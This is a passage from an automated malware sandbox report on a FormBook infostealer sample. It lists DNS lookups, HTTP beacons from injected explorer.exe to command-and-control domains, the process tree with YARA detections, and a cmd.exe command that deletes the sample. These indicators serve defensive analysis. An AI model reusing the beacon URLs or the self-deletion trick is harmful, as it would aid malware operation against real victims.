                                            Nov 25, 2021 15:09:45.317536116 CET8.8.8.8192.168.2.30xbdc7No error (0)www.jakital.comAutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:45.317536116 CET8.8.8.8192.168.2.30xbdc7No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com52.204.216.132A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:45.317536116 CET8.8.8.8192.168.2.30xbdc7No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com54.164.248.48A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:05.650708914 CET8.8.8.8192.168.2.30x6d29No error (0)www.jakital.comAutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:10:05.650708914 CET8.8.8.8192.168.2.30x6d29No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com52.204.216.132A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:05.650708914 CET8.8.8.8192.168.2.30x6d29No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com54.164.248.48A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:10.272214890 CET8.8.8.8192.168.2.30xa6f8Server failure (2)www.xcgtsret.comnonenoneA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:15.319477081 CET8.8.8.8192.168.2.30xf205No error (0)www.vupeliquid.comvupeliquid.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:10:15.319477081 CET8.8.8.8192.168.2.30xf205No error (0)vupeliquid.com34.102.136.180A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.platinumcredit.net
                                            • www.151motors.com
                                            • www.suepersoldiers.com
                                            • www.arsels.info
                                            • www.electricatrick.com
                                            • www.vupeliquid.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.34976634.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 25, 2021 15:09:08.945138931 CET1731OUTGET /sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX HTTP/1.1
                                            Host: www.platinumcredit.net
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:09:09.126287937 CET1734INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Thu, 25 Nov 2021 14:09:09 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "618be73d-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.34978634.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 25, 2021 15:09:14.229963064 CET1779OUTGET /sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX HTTP/1.1
                                            Host: www.151motors.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:09:14.348176003 CET1780INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Thu, 25 Nov 2021 14:09:14 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "618be75c-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.349792142.250.203.11580C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 25, 2021 15:09:19.479118109 CET6789OUTGET /sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX HTTP/1.1
                                            Host: www.suepersoldiers.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:09:20.481894016 CET6790INHTTP/1.1 200 OK
                                            Date: Thu, 25 Nov 2021 14:09:20 GMT
                                            Expires: Thu, 25 Nov 2021 14:19:20 GMT
                                            Cache-Control: public, max-age=600
                                            ETag: "QUrYJA"
                                            X-Cloud-Trace-Context: e9bf4e2176d1e4f430f08354d7ed8296
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Server: Google Frontend
                                            Connection: close
                                            Data Raw: 33 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 74 69 74 6c 65 3e 53 75 65 70 65 72 20 53 6f 6c 64 69 65 72 73 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 31 30 30 2c 33 30 30 2c 34 30 30 2c 35 30 30 2c 37 30 30 2c 39 30 30 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 40 6d 64 69 2f 66 6f 6e 74 40 6c 61 74 65 73 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 64 65 73 69 67 6e 69 63 6f 6e 73 2e 6d 69 6e 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 38 61 63 63 64 31 63 35 2e 63 73 73 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 74 79 6c 65 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 61 70 70 2e 39 30 39 30 37 31 32 38 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 61 66 38 38 30 39 32 37 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 38 61 63 63 64 31 63 35 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 72 6f 6e 67 3e 57 65 27 72 65 20 73 6f 72 72 79 20 62 75 74 20 53 75 65 70 65 72 20 53 6f 6c 64 69 65 72 73 20 64 6f 65 73 6e 27 74 20 77 6f 72 6b 20 70 72 6f 70 65 72 6c 79 20 77 69 74 68 6f 75 74 20 4a 61 76 61 53 63 72 69 70 74 20 65 6e 61 62 6c 65 64 2e 20 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 69 74 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 61 70 70 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 61 66 38 38 30 39 32 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 61 70 70 2e 39 30 39 30 37 31 32 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: 3ef<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" href="/favicon.ico"><title>Sueper Soldiers</title><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@mdi/font@latest/css/materialdesignicons.min.css"><link href="/css/chunk-vendors.8accd1c5.css" rel="preload" as="style"><link href="/js/app.90907128.js" rel="preload" as="script"><link href="/js/chunk-vendors.af880927.js" rel="preload" as="script"><link href="/css/chunk-vendors.8accd1c5.css" rel="stylesheet"></head><body><noscript><strong>We're sorry but Sueper Soldiers doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript><div id="app"></div><script src="/js/chunk-vendors.af880927.js"></script><script src="/js/app.90907128.js"></script></body></html>
                                            Nov 25, 2021 15:09:20.482167959 CET6790INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.349794103.224.212.21980C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 25, 2021 15:09:30.601727009 CET7145OUTGET /sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX HTTP/1.1
                                            Host: www.arsels.info
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:09:30.842940092 CET7146INHTTP/1.1 302 Found
                                            Date: Thu, 25 Nov 2021 14:09:30 GMT
                                            Server: Apache/2.4.25 (Debian)
                                            Set-Cookie: __tad=1637849370.3647175; expires=Sun, 23-Nov-2031 14:09:30 GMT; Max-Age=315360000
                                            Location: http://ww25.arsels.info/sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX&subid1=20211126-0109-303d-a829-871fbc9656f2
                                            Content-Length: 0
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.34981234.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 25, 2021 15:09:35.941904068 CET7185OUTGET /sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX HTTP/1.1
                                            Host: www.electricatrick.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:09:36.061017036 CET7187INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Thu, 25 Nov 2021 14:09:36 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6192576c-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            5192.168.2.34982134.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 25, 2021 15:10:15.342689991 CET7206OUTGET /sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX HTTP/1.1
                                            Host: www.vupeliquid.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:10:15.460524082 CET7207INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Thu, 25 Nov 2021 14:10:15 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6192576d-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: HkE0tD0g4NXKJfy.exe PID: 5624 Parent PID: 5256

                                            General

                                            Start time:15:08:07
                                            Start date:25/11/2021
                                            Path:C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
                                            Imagebase:0xc10000
                                            File size:446976 bytes
                                            MD5 hash:FCC2D1CDA8D3989FECA9C5F5F900E164
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Chronological Activities

                                            Analysis Process: HkE0tD0g4NXKJfy.exe PID: 3336 Parent PID: 5624

                                            General

                                            Start time:15:08:10
                                            Start date:25/11/2021
                                            Path:C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
                                            Imagebase:0xe60000
                                            File size:446976 bytes
                                            MD5 hash:FCC2D1CDA8D3989FECA9C5F5F900E164
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Chronological Activities

                                            Analysis Process: explorer.exe PID: 3352 Parent PID: 3336

                                            General

                                            Start time:15:08:13
                                            Start date:25/11/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff720ea0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Chronological Activities

                                            Analysis Process: msdt.exe PID: 5960 Parent PID: 3352

                                            General

                                            Start time:15:08:34
                                            Start date:25/11/2021
                                            Path:C:\Windows\SysWOW64\msdt.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\msdt.exe
                                            Imagebase:0x1b0000
                                            File size:1508352 bytes
                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: cmd.exe PID: 5904 Parent PID: 5960

                                            General

                                            Start time:15:08:39
                                            Start date:25/11/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
                                            Imagebase:0xd80000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Chronological Activities

                                            Analysis Process: conhost.exe PID: 6108 Parent PID: 5904

                                            General

                                            Start time:15:08:40
                                            Start date:25/11/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7f20f0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Chronological Activities

                                            Disassembly

                                            Code Analysis

                                            Reset < >

                                              Analysis Process: HkE0tD0g4NXKJfy.exe PID: 5624 Parent PID: 5256 HkE0tD0g4NXKJfy.exeCOMMON

                                              Executed Functions

                                              Function 013DD2E8, Relevance: 5.5, Strings: 4, Instructions: 478COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
